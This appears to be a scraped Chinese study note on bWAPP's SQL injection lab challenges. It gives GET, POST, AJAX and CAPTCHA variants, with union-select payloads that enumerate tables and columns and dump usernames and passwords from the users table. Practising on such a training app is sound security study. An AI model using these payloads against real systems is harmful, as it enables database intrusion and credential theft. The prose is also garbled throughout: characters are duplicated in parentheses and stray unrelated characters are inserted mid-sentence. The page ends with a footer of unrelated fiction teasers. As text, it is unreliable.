bWAPP學(xué)習(xí)筆記 - A1 Injection (二)

SQL Injection (GET/Search)

手注練習(xí)題 (^_^)

Level: Low
  1. 先輸入單引號(hào)'苟穆,測試結(jié)果:

源碼中:

 $sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

單引號(hào)的輸入枣申,使得%沒有閉合

  1. 繼續(xù),輸入' or 1=1 #,拼合成功:

3.使用order by亿笤,確定字段數(shù):

URL的title參數(shù)中直接輸入:
title=World%' order by 8 -- &action=search
確定只有7個(gè)字段

  1. 使用union select硕盹,確定顯示位置

title=World%' union select 1,2,3,4,5,6,7 -- &action=search

  1. 查詢當(dāng)前庫,當(dāng)前表祈坠,當(dāng)前用戶:

title=World%' union select 1,table_name,database(),user(),5,6,7 from information_schema.tables where table_schema=database() --

  1. 查詢users表字段:

title=World%' union select 1,column_name,database(),user(),5,6,7 from information_schema.columns where table_name='users' --

  1. 查詢用戶名login和密碼password

title=World%' union select 1,login,password,4,5,6,7 from users --

Level: Medium

使用 addslashes()進(jìn)行了過濾

Level: High

使用 mysql_real_escape_string()進(jìn)行了過濾


SQL Injection (GET/Select)

Level: Low

方法與上面一致害碾,需要注意的是,在源碼中:

 $id = $_GET["movie"];
 $sql = "SELECT * FROM movies";
  // If the user selects a movie
   if($id)        
   {
       $sql.= " WHERE id = " . sqli($id);
   }

注入點(diǎn)在where 中赦拘,需要先使語句失效
輸入 -1 即可

新的拼接語句如下:

movie=-1 union select 1,login,password,4,5,6,7 from users order by 1 --

最終結(jié)果:


Level:Medium/High

與上面的 SQL Injection (GET/Search) 一致慌随!


SQL Injection (POST/Search)

Level: Low

使用Firefox的hackBar插件或者 PostMan工具通過 POST方式提交即可

title=World%' union select 1,login,password,4,5,6,7 from users -- -

Level:Medium/High

與上面的 SQL Injection (GET/Search) 一致!


SQL Injection (POST/Select)

Level: Low

使用Firefox的hackBar插件或者 PostMan工具通過 POST方式提交即可

movie=-1 union select 1,login,password,4,5,6,7 from users order by 1 -- -

Level:Medium/High

與上面的 SQL Injection (GET/Search) 一致另绩!


SQL Injection (AJAX/JSON/jQuery)

Level: Low

這題比較簡單儒陨,原理與上面的Sql注入方式一致花嘶,只是通過另一個(gè)頁面調(diào)用數(shù)據(jù),查看網(wǎng)頁源碼可以看到:
Ajax調(diào)用了 sqli_10-2.php頁面蹦漠,僅需直接針對 sqli_10-2.php頁面進(jìn)行Sql注入即可

Level:Medium/High

sqli_10-2.php的頁面與之前的 SQL Injection (GET/Search)過濾方式 一致椭员!


SQL Injection (CAPTCHA)

多了一個(gè)驗(yàn)證碼驗(yàn)證,其他的與SQL Injection (GET/Search) 一致笛园!

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末隘击,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子研铆,更是在濱河造成了極大的恐慌埋同,老刑警劉巖,帶你破解...
    沈念sama閱讀 219,490評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件棵红,死亡現(xiàn)場離奇詭異凶赁,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)逆甜,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,581評論 3 395
  • 文/潘曉璐 我一進(jìn)店門虱肄,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人交煞,你說我怎么就攤上這事咏窿。” “怎么了素征?”我有些...
    開封第一講書人閱讀 165,830評論 0 356
  • 文/不壞的土叔 我叫張陵集嵌,是天一觀的道長。 經(jīng)常有香客問我御毅,道長根欧,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,957評論 1 295
  • 正文 為了忘掉前任亚享,我火速辦了婚禮咽块,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘欺税。我一直安慰自己侈沪,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,974評論 6 393
  • 文/花漫 我一把揭開白布晚凿。 她就那樣靜靜地躺著亭罪,像睡著了一般。 火紅的嫁衣襯著肌膚如雪歼秽。 梳的紋絲不亂的頭發(fā)上应役,一...
    開封第一講書人閱讀 51,754評論 1 307
  • 那天,我揣著相機(jī)與錄音,去河邊找鬼箩祥。 笑死院崇,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的袍祖。 我是一名探鬼主播底瓣,決...
    沈念sama閱讀 40,464評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼蕉陋!你這毒婦竟也來了捐凭?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,357評論 0 276
  • 序言:老撾萬榮一對情侶失蹤凳鬓,失蹤者是張志新(化名)和其女友劉穎茁肠,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體缩举,經(jīng)...
    沈念sama閱讀 45,847評論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡垦梆,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,995評論 3 338
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了仅孩。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片奶赔。...
    茶點(diǎn)故事閱讀 40,137評論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖杠氢,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情另伍,我是刑警寧澤鼻百,帶...
    沈念sama閱讀 35,819評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站摆尝,受9級特大地震影響温艇,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜堕汞,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,482評論 3 331
  • 文/蒙蒙 一勺爱、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧讯检,春花似錦琐鲁、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,023評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至投放,卻和暖如春奈泪,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,149評論 1 272
  • 我被黑心中介騙來泰國打工涝桅, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留拜姿,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,409評論 3 373
  • 正文 我出身青樓冯遂,卻偏偏與公主長得像蕊肥,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子债蜜,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,086評論 2 355

推薦閱讀更多精彩內(nèi)容